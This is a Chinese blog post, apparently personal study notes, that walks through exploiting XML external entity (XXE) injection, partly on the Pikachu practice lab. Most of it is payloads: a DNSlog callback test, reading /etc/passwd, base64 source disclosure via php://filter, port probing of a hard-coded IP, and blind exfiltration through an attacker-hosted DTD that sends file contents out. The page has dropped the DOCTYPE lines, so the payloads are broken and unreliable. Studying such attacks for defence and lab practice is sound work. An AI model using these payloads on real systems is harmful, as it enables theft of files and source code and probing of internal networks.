XXE

最新推荐文章于 2024-03-30 20:32:16 发布
最新推荐文章于 2024-03-30 20:32:16 发布
阅读量178 收藏
点赞数
分类专栏: 常规漏洞 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qfslyy/article/details/112230808
版权

直接对服务器进行攻击的手段,XML外部(DTD)实体注入(XML文档,一种标签语言,作用是将数据,运行部分程序,对象,转换为xml格式存放,在别处调用时继续使用。有漏洞,可以写xml格式恶意代码让服务器执行。)
xml主要分为三部分

<?xml version=‘1.0’ encoding='utf-8'(版本,编码) ?> >

%aaa;
]>

抓包,增加以上代码,http地址写上dnslog.cn的地址
然年forward,刷新dnslog,有回应,有xxe漏洞。
在这里插入图片描述

xxe文件读取:

假如查passwd:

在这里插入图片描述
抓包

在这里插入图片描述
改为post(get也可以)
在这里插入图片描述

加入

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

&xxe;

放包。
在这里插入图片描述

爆当前页面源码:
需要base64编码。改动实体的值即可

“php://filter/read=convert.base64-encode/resource=index.php”

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">

]>
&xxe;

之后

在这里插入图片描述

将64码解码即可。

pikachu xxe:

<?xml version = "1.0"?> <!ENTITY f SYSTEM "file:///www/wwwroot/pikachu-master/liukun.txt">

]>&f;

<!ENTITY hacker "ESHLkangi">

内网端口探测,应用程序攻击:

<?xml version="1.0"?> <!ENTITY xxe SYSTEM "http://120.78.92.198:8030">

]>
&xxe;

端口如果存在,回显会很快,若不存在,则回显很慢或者无回显。

二:

<?xml version="1.0"?>

]>
&test;Mikasa
截取回包,即可获得在这里插入图片描述
的文件内容
在这里插入图片描述

如果没有回显:
只告诉结果,不报错时怎么办:
搭建网站新建dtd文件放在目录下,(在黑客自己的网站)编辑内容为

<!ENTITY % payload “<!ENTITY % send SYSTEM 'http://127.0.0.1/?cpn=%ttt;'>">

%payload;

引用dtd文件:

<?xml version="1.0"?> <!ENTITY % dtd SYSTEM "http://192.168.0.47/aaa.dtd">

%dtd;
%send;
]>

ms小阿k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE(外部实体注入攻击)
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
xxe
h3110n3w0r1d
04-05 403
1.如何甄别可能存在xxe 最直接的回答就是: 甄别那些接受XML作为输入内容的端点。 但是有时候,这些端点可能并不是那么明显(比如,一些仅使用JSON去访问服务的客户端)。 在这种情况下,渗透测试人员就必须尝试不同的测试方式,比如修改HTTP的请求方法,修改Content-Type头部字段等等方法,然后看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE注入详解】 XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档中的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,...
XXE(1)
1stPeak's Blog
04-06 320
XXE简介 XXE:全称XML External Entity Injection,即XML外部实体注入漏洞 知识点 1、XML 2、DTD,这个是最重要的 简介: (1)内部的 DOCTYPE 声明 假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中: <!DOCTYPE 根元素 [元素声明]> 例如: <!DOCTYPE no...
XXE以及实例
最新发布
doubirui的博客
03-30 956
其中最常见的一种攻击是利用DTD(Document Type Definition)来读取本地文件,通过将file://协议和可访问的文件路径嵌入到XML中,攻击者可以读取服务器上的敏感文件内容。在 XML 中,CDATA 块是一种特殊的文本块,用于包含任意文本数据,包括标签和特殊字符,而不需要进行转义处理。总结起来,使用 % 的形式是参数实体引用的一种特殊用法,用于引用其他实体。需要注意的是,对于一般的实体引用,如 % 或 %,可以在 XML 文档中的任何位置使用,而不仅限于参数实体引用的定义中。
XXE(xml外部实体攻击)
HoYim
04-11 4428
1、概念 XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
XXE总结
weixin_43940853的博客
03-03 240
XXE 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 我们在本地测试xxe https://github.com/c0ny1/...
xxe漏洞的学习与利用总结
weixin_30701575的博客
07-29 2331
前言 对于xxe漏洞的认识一直都不是很清楚,而在我为期不长的挖洞生涯中也没有遇到过,所以就想着总结一下,撰写此文以作为记录,加深自己对xxe漏洞的认识。 xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括...
XXE详解
洋洋的小黑屋
01-13 2645
XXE(XML外部实体注入),程序解析XML数据时候,同时解析了攻击者伪造的外部实体。 XML用途是为了跨平台语言传输数据。常常用于WEB开发等 XML格式规范 XML有自己的一个格式规范,由叫DTD的东西进行控制 DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在另外一个单独的文件中(外部...
PentesterLab XXE
08-12
PentesterLab XXE是一个关于XML注入(XXE)的培训平台,它提供了关于XXE漏洞的理论知识和实际演练。XXE漏洞是一种安全漏洞,利用XML解析器对外部实体的处理不当,使攻击者能够读取本地文件、执行远程请求等。通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值